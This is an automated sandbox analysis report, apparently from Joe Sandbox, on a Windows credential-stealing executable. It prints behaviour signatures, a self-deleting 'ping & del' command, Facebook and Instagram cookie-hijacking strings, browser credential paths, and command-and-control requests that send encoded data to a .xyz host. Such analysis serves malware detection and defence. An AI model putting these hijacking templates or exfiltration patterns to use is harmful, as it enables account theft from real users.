Play interactive tour

Edit tour

Analysis Report aOn5CfTiwS

Overview

General Information

Sample Name:	aOn5CfTiwS (renamed file extension from none to exe)
Analysis ID:	346349
MD5:	013eba0050ebe18e39978e89a56c0fab
SHA1:	85ef7c03d70e2cc7095550ce15f140e78d05f3ad
SHA256:	5fa60303a0c4fd13ecd69e7c1a17788b72605473c2fb3f93eb758010326c76e5
Most interesting Screenshot:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Multi AV Scanner detection for submitted file

Installs new ROOT certificates

Machine Learning detection for sample

PE file has a writeable .text section

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

PE file contains an invalid checksum

PE file contains strange resources

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

aOn5CfTiwS.exe (PID: 4088 cmdline: 'C:\Users\user\Desktop\aOn5CfTiwS.exe' MD5: 013EBA0050EBE18E39978E89A56C0FAB)

1612058829275.exe (PID: 5644 cmdline: 'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)

ThunderFW.exe (PID: 5436 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)

cmd.exe (PID: 460 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5352 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.265213011.0000000010249000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x16643e:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E
00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x22efa0:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.aOn5CfTiwS.exe.2880000.2.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x22efa0:$x1: cmd /c ping 127.0.0.1 -n
0.2.aOn5CfTiwS.exe.2880000.2.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x22efa0:$x1: cmd /c ping 127.0.0.1 -n
0.2.aOn5CfTiwS.exe.10000000.3.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x22efa0:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: aOn5CfTiwS.exe	Virustotal: Detection: 43%	Perma Link
Source: aOn5CfTiwS.exe	Metadefender: Detection: 24%	Perma Link
Source: aOn5CfTiwS.exe	ReversingLabs: Detection: 47%

Machine Learning detection for sample

Show sources

Source: aOn5CfTiwS.exe

Joe Sandbox ML: detected

Cryptography:

Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Unpacked PE file: 0.2.aOn5CfTiwS.exe.2880000.2.unpack

Uses 32bit PE files

Show sources

Source: aOn5CfTiwS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Uses new MSVCR Dlls

Show sources

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.0.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp, 1612058829275.exe.0.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.0.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.0.dr
Source:	Binary string: atl71.pdb source: atl71.dll.0.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.0.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.0.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.0.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.0.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.0.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.0.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000002.00000000.231496774.000000000095C000.00000002.00020000.sdmp, ThunderFW.exe.0.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.0.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.0.dr

Networking:

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: Joe Sandbox View

IP Address: 198.54.117.244 198.54.117.244

Source: global traffic

HTTP traffic detected: GET /info/dd HTTP/1.1Host: 1a469593c1fe15dc.xyzaccept: */*User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: 9https://www.facebook.com/chat/video/videocalldownload.php+ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: bad allocation"encrypted":"name="fb_dtsg" value="accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://m.facebook.com/?_rdr""logout.phpaccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=\"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://m.facebook.com/logout.phpc_user=deletedbad allocationhttps://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesaccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1ocation: equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/accountquality/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: ocation: accept: /origin: https://www.instagram.comreferer: https://www.instagram.com/sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: cross-siteaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri="access_token":"""access_token":"sessionid="";sessionid=https://www.instagram.com/accounts/login/ajax/facebook/accept: /origin: https://www.instagram.comreferer: https://www.instagram.com/sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: same-originaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1x-csrftoken: xaccessToken=&fbUserId=;sessionid="username":"https://www.instagram.com/accept: /sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: same-originaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1"accept: /sec-fetch-dest: emptysec-fetch-mode: corssec-fetch-site: same-originaccept-language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7upgrade-insecure-requests: 1https://www.instagram.com//?__a=1{}graphqluseredge_followed_bycountgraphqluseredge_followed_bycountbad allocationMZ equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: origin: https://www.facebook.com equals www.facebook.com (Facebook)
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: seller=^Aguid=^Astatus=^Ainfo/stepbad allocation\Microsoft\Windows\Cookies\Low\..txt\rbc_userxsrb=; c_user=xs=wininet.dllInternetGetCookieEx2InternetFreeCookies=; c_user=xs=https://www.facebook.com/facebook.comc_user=xs=c_user=xs=bad allocationfacebook.com\.txt.exe"%s" /sjson "%s"rbHost NameValueHost NameName=Value; c_user=xs=bad allocation\.\\\Google\Chrome\User Data\Chromium\User DataCookiesSystem ProfileCHROMECHROMIUM\Cookies\Login Data\Local StateChromeUserPath.\fb_cookie.cpp[HIJACK][%s][%s][%d]: [INFO] strCookies = %s strBrowser = %s equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: 1a469593c1fe15dc.xyz

Source: unknown

HTTP traffic detected: POST /info/step HTTP/1.1Host: 1a469593c1fe15dc.xyzaccept: */*Content-Type:application/x-www-form-urlencodedUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Length: 93Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 5a 64 4d 30 58 42 72 45 4c 4b 67 75 74 77 72 64 4a 74 62 31 69 71 5a 6e 39 6a 6a 58 68 58 56 55 41 7e 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFZdM0XBrELKgutwrdJtb1iqZn9jjXhXVUA~~

Source: aOn5CfTiwS.exe	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/dd
Source: aOn5CfTiwS.exe, 00000000.00000003.245417883.00000000022AD000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/ddpbidden
Source: aOn5CfTiwS.exe, 00000000.00000003.245417883.00000000022AD000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/ddpxztN8b6xDUh
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/fb
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/fb1.6
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/fbX
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.211964595.0000000002DF6000.00000004.00000040.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/step
Source: aOn5CfTiwS.exe, 00000000.00000003.230318427.00000000022AE000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepbidden
Source: aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepmsn.com%2FB
Source: aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepstatus=0&L
Source: aOn5CfTiwS.exe, 00000000.00000003.230318427.00000000022AE000.00000004.00000001.sdmp	String found in binary or memory: http://1a469593c1fe15dc.xyz/info/stepxztN8b6xDUh
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 6C0CE2DD0584C47CAC18839F14055F19FA270CDD.0.dr	String found in binary or memory: http://charlesproxy.com/ssl
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: xldl.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://exchangework%04d%02d%02d.xyz/accept:
Source: aOn5CfTiwS.exe, 00000000.00000003.216601589.00000000022A8000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
